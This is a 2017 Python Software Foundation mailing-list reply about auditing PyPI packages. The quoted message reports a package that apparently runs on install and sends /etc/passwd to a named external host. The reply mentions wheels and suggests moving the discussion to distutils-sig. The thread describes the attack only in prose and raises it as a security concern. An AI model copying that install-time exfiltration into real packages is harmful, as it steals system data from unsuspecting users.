[PSF-Community] Dangerous PyPI packages and PSF
Noah Kantrowitz
noah at coderanger.net
Fri May 5 00:22:28 EDT 2017
> On May 4, 2017, at 4:41 PM, Bruno Rocha <rochacbruno at gmail.com> wrote:
>
> Hi,
>
> I just read this on reddit[0], a thread asking if PyPI packages are audited and somebody pointed the `python-nation`[1] which is a harmful and useless module, installing itself and sending the `/etc/passwd` content to external endpoint.
>
> The app receiving the data is hosted at http://python-nation.herokuapp.com
>
> and as the PSF mission [2] says
>
> The mission of the Python Software Foundation is to promote, protect, and advance the Python programming language
>
> I wonder if there are some workgroup at PSF to handle this? and not only the specific case of `python-nation` which should be deleted and the user banned maybe, But also to handle the audit of other packages?
>
>
> [0] https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/
> [1] https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/dh4uyf8/
> [2] https://www.python.org/psf/mission/
Specifically re: the vector of running code at install time, wheels can help with this though I don't think there is a good way to tell pip to ignore non-wheel builds. But even then, the whole point is that you're downloading code from the internet :) If you want to discuss this further I recommend the distutils-sig mailing list.
--Noah
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 801 bytes
Desc: Message signed with OpenPGP
URL: <http://mail.python.org/pipermail/psf-community/attachments/20170504/ed49bd85/attachment.sig>
More information about the PSF-Community
mailing list